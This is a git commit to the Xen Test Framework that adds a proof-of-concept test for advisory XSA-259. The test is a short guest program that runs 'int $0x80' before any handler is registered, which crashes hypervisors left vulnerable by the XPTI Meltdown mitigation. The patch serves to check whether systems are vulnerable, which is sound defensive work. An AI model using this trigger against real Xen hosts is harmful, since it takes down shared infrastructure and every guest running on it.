From: Andrew Cooper <andrew.cooper3@citrix.com>
Date: Mon, 12 Mar 2018 13:35:23 +0000 (+0000)
Subject: XSA-259 PoC
X-Git-Url: http://xenbits.xensource.com/gitweb?a=commitdiff_plain;h=c603b6b3b13f3e3eca7c62d447994402c25cdc9d;p=xtf.git

XSA-259 PoC

Signed-off-by: Andrew Cooper <andrew.cooper3@citrix.com>
---

diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index 4831d15..8b8325d 100644
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -114,6 +114,8 @@ guest breakout.
 
 @subpage test-xsa-255 - grant table v2 -> v1 transition may crash Xen.
 
+@subpage test-xsa-259 - x86: PV guest may crash Xen with XPTI.
+
 
 @section index-utility Utilities
 
diff --git a/tests/xsa-259/Makefile b/tests/xsa-259/Makefile
new file mode 100644
index 0000000..bbfd662
--- /dev/null
+++ b/tests/xsa-259/Makefile
@@ -0,0 +1,9 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-259
+CATEGORY  := xsa
+TEST-ENVS := pv32pae pv64
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-259/main.c b/tests/xsa-259/main.c
new file mode 100644
index 0000000..2cf0733
--- /dev/null
+++ b/tests/xsa-259/main.c
@@ -0,0 +1,52 @@
+/**
+ * @file tests/xsa-259/main.c
+ * @ref test-xsa-259
+ *
+ * @page test-xsa-259 XSA-259
+ *
+ * Advisory: [XSA-259](http://xenbits.xen.org/xsa/advisory-259.html)
+ *
+ * The Meltdown mitigation work (XPTI) didn't correctly deal with an error
+ * path connecting the `int $0x80` special case handing with general exception
+ * handling, which causes Xen to write 0 to an address near 2^64, and suffer a
+ * fatal pagefault.
+ *
+ * The bug can be triggered by using `int $0x80` before registering a handler
+ * with Xen.  If vulnerable, Xen will crash.
+ *
+ * @see tests/xsa-259/main.c
+ */
+#include <xtf.h>
+
+const char test_title[] = "XSA-259 PoC";
+
+void test_main(void)
+{
+    exinfo_t fault = 0;
+
+    asm volatile ("1: int $0x80; 2:"
+                  _ASM_EXTABLE_HANDLER(1b, 2b, ex_record_fault_eax)
+                  : "+a" (fault)
+                  : "X" (ex_record_fault_eax));
+
+    /*
+     * If Xen is vulnerable, it should have crashed.  If Xen is not
+     * vulnerable, we should have got #GP[0x80|IDT] from the attempt to use a
+     * misconfigured IDT entry.
+     */
+    if ( fault != EXINFO_SYM(GP, (0x80 << 3) | X86_EC_IDT) )
+        return xtf_error("Error: Unexpected fault %#x, %pe\n",
+                         fault, _p(fault));
+
+    xtf_success("Success: Not vulnerable to XSA-259\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */